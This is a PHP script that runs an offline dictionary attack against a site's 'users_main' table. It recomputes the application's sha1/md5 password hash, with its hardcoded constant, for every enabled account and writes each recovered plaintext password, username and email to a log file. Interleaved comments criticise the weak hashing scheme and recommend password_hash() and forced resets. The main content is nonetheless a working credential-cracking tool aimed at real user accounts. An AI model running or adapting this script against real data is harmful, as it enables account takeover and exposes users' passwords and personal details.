bruteforce.phps
#!/usr/bin/php5
<?php
// Offline dictionary attack against a readable `users_main` table: for every
// enabled account the script recomputes the password hash for each wordlist
// entry and records any match in cleartext.
//
// The commented-out line below appears to be the application's own hashing
// routine (TODO confirm against the application source); the candidate check
// further down reproduces the same construction.
// return sha1(md5($Secret).$Str.sha1($Secret).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}');
//
// Defensive reading of that scheme: it is built only from MD5 and SHA-1, fast
// general-purpose digests applied once, with no work factor. The per-user
// `secret` is stored in the same row as `passhash`, and the trailing constant
// is a fixed string, so neither protects the passwords once the table and the
// application source are both exposed. The mitigation is a slow, salted
// password hash -- in PHP, password_hash() / password_verify(), with
// password_needs_rehash() to migrate accounts at their next login -- and a
// forced password reset for every account whose hash was exposed.
//
$start = $steptime = time();
// Lifts the execution time limit and requests a 100M memory limit: the run is
// expected to be long and keeps the whole selected user set in memory.
set_time_limit(0);
ini_set(memory_limit, '100M');
// Connects to the local MySQL server; user name and password are blank here
// (possibly redacted before publication -- cannot tell from this page).
mysql_connect('localhost', '','');
mysql_select_db('metalbits');
// Start at word #
// $argv[1] is used only when it consists solely of digits; otherwise 0.
if(ctype_digit($argv[1])) {
$step = $argv[1];
} else { $step = 0; }
// Fetch # words at a time
// $argv[2] is used only when it consists solely of digits; otherwise 1000.
if(ctype_digit($argv[2])) {
$chunk = $argv[2];
} else { $chunk = 1000; }
$users = array();
// Pulls the password hash, its per-user secret and the identifying fields
// (username, email, class) of every enabled account into $users.
$res = mysql_query('SELECT username, passhash, secret, email, class FROM users_main WHERE enabled="1"') or die(mysql_error());
while($row = mysql_fetch_assoc($res)) {
$users[] = $row;
}
mysql_free_result($res);
$collected = count($users);
echo "Users collected: $collected\n";
// Switches to a separate `dictionary` database; the candidate words are the
// `str` column of its `md5` table, and $words is that table's row count.
mysql_select_db('dictionary');
$words = join('',mysql_fetch_row(mysql_query('SELECT COUNT(*) FROM md5')));
// Pages through the wordlist $chunk rows at a time, starting at offset $step.
while($step <= $words) {
$wordlist = array();
// $step and $chunk are digit-only strings or the integer defaults set above.
$limit = ' LIMIT '.$step.','.$chunk;
$res = mysql_query('SELECT str FROM md5'.$limit) or die(mysql_error());
while($row=mysql_fetch_row($res)) {
$wordlist[] = join('',$row);
}
// Progress report: percentage of the wordlist consumed, plus an ETA that
// multiplies the duration of the previous chunk by the chunks remaining.
$prog = round((($step/$words)*100),2);
$chunks = (($words - $step) / $chunk); // Total amount of wordlist chunks left
$timeleft = (time()-$steptime)*$chunks;
$eta = time_diff(time(), time()+$timeleft, 2);
$steptime = time();
echo "Fetched words $step to ".($step+$chunk)." of $words, got: ".count($wordlist)." - progress($prog%) users left(".count($users).") eta($eta)\n";
foreach($wordlist as $word) {
for($u=0, $size = sizeof($users); $u < $size; ++$u) {
$user = $users[$u];
// Recomputes the hash for this candidate with the account's stored secret and
// compares it to the stored passhash. The comparison is the loose `==`, which
// compares numeric-looking strings as numbers, so a reported hit is not
// strictly a byte-for-byte match. NOTE(review): application-side verification
// should compare digests with hash_equals().
if($user['passhash'] == sha1(md5($user['secret']).$word.sha1($user['secret']).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}')) {
// Every hit is emitted with username, recovered plaintext password, email and
// class, both to stdout and to bruteforce.log in the working directory. For
// incident response that file is evidence of which accounts were recovered and
// is itself a cleartext credential store that has to be secured.
writeLog("User: $user[username] Pass: $word Email: $user[email] Class: $user[class]");
// Drops the matched account from the in-memory list.
unset($users[$u]);
}
}
}
$step = $step + $chunk;
unset($wordlist);
}
/**
 * Append a line to bruteforce.log and, in the default mode, print it as well.
 *
 * The only caller in this file passes a line holding a username, a recovered
 * plaintext password, an email address and a user class, so the log file is a
 * cleartext credential store and should be handled as sensitive evidence.
 *
 * @param string $str  Text to record; a newline is appended.
 * @param string $type 'both' writes to the file and to stdout, 'file' writes
 *                     to the file only; any other value does nothing.
 * @return void
 */
function writeLog($str, $type='both') {
    // Non-strict membership test, matching the loose `==` checks it replaces.
    $wantsFile = in_array($type, array('both', 'file'));
    if ($wantsFile) {
        // Opened in append mode relative to the current working directory;
        // the fopen() result is used without being checked.
        $handle = fopen('bruteforce.log', 'a');
        fwrite($handle, $str."\n");
        fclose($handle);
    }
    if ($type == 'both') {
        echo "$str\n";
    }
}
/**
 * Format the span between two Unix timestamps as a compact string such as
 * "1d1h" or "2w".
 *
 * Units are emitted largest first (Y, M, w, d, h, m and optionally s); units
 * whose count is zero are skipped, and at most $Levels units are emitted.
 *
 * @param int        $PastTime    Start of the span (Unix timestamp).
 * @param int|string $FutureTime  End of the span; '' means "now".
 * @param int        $Levels      Maximum number of units in the result.
 * @param bool       $ShowAgo     Accepted for compatibility; has no effect on
 *                                the result (the suffix code is commented out
 *                                in the original).
 * @param bool       $ShowSeconds Whether a seconds unit may be emitted.
 * @param int        $Time        Span in seconds; when non-zero it is used
 *                                instead of $FutureTime - $PastTime.
 * @return string|false 'Never' for the sentinel start time, false when
 *                      $FutureTime precedes $PastTime, 'N/A' when no unit was
 *                      emitted, otherwise the formatted span.
 */
function time_diff($PastTime,$FutureTime='',$Levels=2, $ShowAgo = false, $ShowSeconds = false, $Time = 0) {
    // Sentinel start time, formatted in the default timezone.
    // NOTE(review): presumably the value a zero database date converts to -- confirm.
    if (date('Y-m-d H:i:s', $PastTime) == '1999-11-30 00:00:00') {
        return 'Never';
    }
    if ($FutureTime == '') {
        $FutureTime = time();
    }
    if ($FutureTime < $PastTime) {
        return false;
    }
    if (!$Time) {
        $Time = $FutureTime - $PastTime;
    }

    // Unit suffix => length in seconds, largest unit first.
    $unitSeconds = array(
        'Y' => 31556926, // seconds in a year
        'M' => 2629744,  // seconds in a month
        'w' => 604800,   // seconds in a week
        'd' => 86400,    // seconds in a day
        'h' => 3600,
        'm' => 60,
    );

    $left = $Time;
    $text = '';
    foreach ($unitSeconds as $suffix => $span) {
        // The remainder is always reduced, even when the unit is not printed.
        $count = floor($left / $span);
        $left = $left - $count * $span;
        if ($count > 0 && $Levels > 0) {
            $text .= $count.$suffix;
            $Levels--;
        }
    }

    // Whatever is left after minutes is the seconds component.
    if ($ShowSeconds && $left > 0 && $Levels > 0) {
        $text .= $left.'s';
        $Levels--;
    }

    if ($text == '') {
        return 'N/A';
    }
    return $text;
}
?>